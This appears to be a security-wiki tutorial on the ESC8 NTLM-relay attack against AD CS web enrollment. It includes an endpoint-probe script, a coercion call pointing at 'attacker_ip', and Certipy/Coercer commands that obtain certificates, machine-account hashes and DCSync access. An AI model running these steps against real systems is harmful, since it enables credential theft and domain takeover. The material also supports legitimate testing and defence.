ESC8

TL;DR

ESC8 abuses the AD CS web enrollment interface: an attacker relays a coerced NTLM authentication from an elevated computer or user account to that interface, obtains a certificate issued to that account, and then uses the certificate for client authentication to Kerberos (PKINIT) as the account.

An AD CS deployment is vulnerable to ESC8 when the Certificate Authority Web Enrollment role is installed and reachable, typically at http://[AD CS Server]/certsrv/. By default the interface accepts NTLM authentication over plain HTTP and does not enforce Extended Protection for Authentication (EPA), so an attacker can relay NTLM authentication to it and obtain a certificate as another user or computer account. Note that this is a property of the CA's web enrollment endpoint, not of any one template; the relayed account still needs enrollment rights on a template that allows client authentication (for computer accounts, typically Machine, or DomainController for a DC).
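Before setting up a relay it is worth confirming that the endpoint really is exposed the way ESC8 needs. The following is an added example, not code from the original page or from Certipy/Coercer: it sends one unauthenticated GET to the web enrollment URL and classifies the 401 challenge. NTLM (or Negotiate, whose NTLM fallback IIS accepts by default) over plain HTTP means channel binding cannot protect the endpoint and relay will work; over HTTPS, relay only works if EPA is not enforced, which headers alone cannot tell you. The host name ca.corp.local and the sample response headers are constructed for the demonstration.

```python
"""
ESC8 pre-check: is the AD CS Web Enrollment endpoint exposed in a relayable way?

Added example for this page; it is not Certipy or Coercer code. It reads the
401 challenge that /certsrv/ returns and classifies it:
  relayable-http   NTLM/Negotiate offered over plain HTTP: no channel binding is
                   possible, so a relayed NTLM authentication will be accepted.
  https-check-epa  NTLM offered over HTTPS: relay works only if EPA is not
                   enforced, which headers alone cannot tell you.
  not-relayable    no 401 or no NTLM/Negotiate (anonymous, Basic-only, or not
                   the web enrollment endpoint).
The host name ca.corp.local and the sample headers below are constructed.
"""
import http.client
import sys
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class ProbeResult:
    url: str
    status: int
    auth_schemes: list  # scheme token of each WWW-Authenticate header


# Constructed sample: what an IIS-hosted /certsrv/ typically answers to an
# unauthenticated GET (only the relevant headers are shown).
SAMPLE_URL = "http://ca.corp.local/certsrv/"
SAMPLE_STATUS = 401
SAMPLE_HEADERS = [
    ("Server", "Microsoft-IIS/10.0"),
    ("WWW-Authenticate", "Negotiate"),
    ("WWW-Authenticate", "NTLM"),
    ("Content-Length", "1293"),
]


def parse_auth_schemes(headers):
    """Return the scheme token of every WWW-Authenticate header, in order.
    IIS emits one header per scheme, so 'Negotiate' and 'NTLM' arrive separately."""
    schemes = []
    for name, value in headers:
        if name.lower() == "www-authenticate" and value.strip():
            schemes.append(value.split()[0])
    return schemes


def classify(result):
    scheme = urlparse(result.url).scheme.lower()
    # Negotiate counts: IIS accepts the NTLM fallback inside SPNEGO by default,
    # and relay tools (Certipy relay, ntlmrelayx) drive exactly that fallback.
    ntlm = any(s.lower() in ("ntlm", "negotiate") for s in result.auth_schemes)
    if result.status != 401 or not ntlm:
        return "not-relayable"
    if scheme == "http":
        return "relayable-http"
    return "https-check-epa"


def classify_sample():
    """Run the classifier over the constructed sample response."""
    return classify(ProbeResult(SAMPLE_URL, SAMPLE_STATUS, parse_auth_schemes(SAMPLE_HEADERS)))


def probe(url, timeout=5):
    """Send one unauthenticated GET to the web enrollment URL and classify the reply.
    Only this function touches the network."""
    u = urlparse(url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port, timeout=timeout)
    try:
        conn.request("GET", u.path or "/certsrv/")
        resp = conn.getresponse()
        return ProbeResult(url, resp.status, parse_auth_schemes(resp.getheaders()))
    finally:
        conn.close()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        r = probe(sys.argv[1])
        print(r.url, r.status, r.auth_schemes, classify(r))
    else:
        print(SAMPLE_URL, "->", classify_sample())
```

Run it with the enrollment URL as the only argument (for example `python3 esc8_check.py http://ca.corp.local/certsrv/`); with no argument it classifies the constructed sample. A "relayable-http" verdict is the condition the rest of this page relies on; "https-check-epa" means you still have to try the relay (or inspect the IIS site's Extended Protection setting) before concluding the CA is exposed.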

To exploit ESC8, we need a method of coercing a target computer to authenticate to an attacker-controlled computer. This is commonly done by abusing Remote Procedure Call (RPC) interfaces exposed by the target that take a path or server name as an argument and make the target connect to it, which triggers the authentication.

As a simplified illustration, consider an RPC function, RpcCopyFile, that takes three arguments: a SrcFile UNC path, a DstFile UNC path, and a set of flags. (RpcCopyFile is an illustrative name. The functions abused in practice, all implemented by Coercer, include EfsRpcOpenFileRaw from MS-EFSR (PetitPotam), RpcRemoteFindFirstPrinterChangeNotificationEx from MS-RPRN (PrinterBug), NetrDfsAddStdRoot from MS-DFSNM and IsPathSupported from MS-FSRVP; each accepts a path or host that the target will connect to.)

The RpcCopyFile function simply copies the file at SrcFile to DstFile. If SrcFile is a UNC path on a different computer, however, the target computer that receives the RPC call will open an SMB connection to that computer to fetch the file, and in doing so authenticates to it as its own machine account (e.g. TARGET$).

Putting it all together, if you want to coerce a target computer to authenticate to your attacker's computer, send it the following RPC function call:

RpcCopyFile(SrcFile="\\attacker_ip\share\file.txt", DstFile="C:\Temp\file.txt")

When the target computer attempts to authenticate to the attacker's computer, the listener running there (Certipy's relay or ntlmrelayx) relays that NTLM authentication to the HTTP-based certificate enrollment interface and requests a certificate for the relayed account, which is the target's machine account. The relay has to happen while the coerced authentication is live, so start the relay listener before triggering coercion.

Once the certificate is obtained, we can use it to request a Kerberos Ticket Granting Ticket (TGT) for the computer account using the PKINIT Kerberos extension.

Check out UnPAC The Hash to learn how we can obtain the account's NTLM hash using PKINIT.

Exploit

Set Up Relay On Attacker Computer

Linux (Attacker)
certipy relay -target 'http://[CA FQDN]' -template [template]

Start this first and leave it running. Choose the template to match the account you are about to coerce: DomainController if the target is a Domain Controller, Machine for other domain-joined hosts. The issued certificate is written to a .pfx file named after the relayed account.

Coerce A Target Computer To Authenticate to the Attacker's Computer

Linux (Attacker)
coercer coerce -l [attacker ip] -t [target ip] -u [username] -p [password] -d [domain]

Any valid, low-privileged domain credential is enough to trigger the coercion; the privilege comes from the target's machine account, not from the one used here.

Obtain The Target Computer Account's NT Hash

Linux
certipy auth -pfx [.pfx output] -dc-ip [DC IP]

Takes the certificate in .pfx format written by the relay step, performs PKINIT to obtain a TGT for the account named in the certificate, and then recovers that account's NT hash (UnPAC the Hash). If the coerced host was a Domain Controller, the resulting DC machine account hash can be used to perform DCSync.
